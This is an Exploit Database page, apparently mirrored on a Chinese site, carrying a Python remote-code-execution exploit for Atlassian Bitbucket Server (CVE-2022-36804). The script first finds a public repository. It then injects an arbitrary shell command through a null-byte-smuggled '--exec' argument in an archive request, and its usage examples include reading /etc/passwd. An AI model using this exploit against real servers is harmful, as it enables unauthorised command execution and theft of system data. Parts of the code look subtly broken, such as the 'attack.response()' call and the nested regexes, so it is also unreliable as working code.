Bitbucket v7.0.0 – RCE

• Exploit Database
• 39 阅读

• 作者： khal4n1
  日期： 2023-03-23
• 类别：

  • webapps
  平台：

  • Python
• 来源：https://www.exploit-db.com/exploits/51040/

• # Exploit Title: Bitbucket v7.0.0 -RCE
  # Date: 09-23-2022
  # Exploit Author: khal4n1
  # Vendor Homepage: https://github.com/khal4n1
  # Tested on: Kali and ubuntu LTS 22.04
  # CVE : cve-2022-36804
  
  #****************************************************************#
  #The following exploit is used to exploit a vulnerability present
  #Atlassian Bitbucket Server and Data Center 7.0.0 before version
  #7.6.17, from version 7.7.0 before version 7.17.10, from version
  #7.18.0 before version 7.21.4, from version 8.0.0 before version
  #8.0.3, from version 8.1.0 before version 8.1.3, and from version
  #8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1
  
  #Usage Example
  
  # python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'
  
  # python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'
  
  #The server will send a 500 http response with the stout output from the
  # commandexecuted.
  
  
  #****************************************************************#
  
  #!/usr/bin/python3
  
  import argparse
  import urllib
  from urllib import request
  import re
  
  #argument setup
  parser = argparse.ArgumentParser(description='Program to test
  bitbucket vulnerability CVE-2022-36804')
  parser.add_argument("--url", help="Set the target to attack.
  [REQUIRED]", required=True )
  parser.add_argument("--cmd", help="Set the command to execute.
  [DEFAULT ID]", required=True, default='id')
  args = parser.parse_args()
  cmd= urllib.parse.quote(args.cmd)
  
  
  #reads from the public repository what is available
  requ = request.urlopen(args.url+ "/repos?visibility=public")
  response = requ.read()
  
  #select a public project and stores it in a variable
  project = re.findall('7990/projects/(.*)/repos/',
  str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]
  
  #Selects a public repo and stores it in a vatiable
  file = re.findall('/repos/(.*)/browse',
  str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]
  
  # Exploitation
  try :
  attack = request.urlopen(args.url +
  "/rest/api/latest/projects/" + project + "/repos/" + file +
  "/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin")
  print (attack.response())
  except urllib.error.HTTPError as e:
  body = e.read().decode()# Read the body of the error response
  print (body)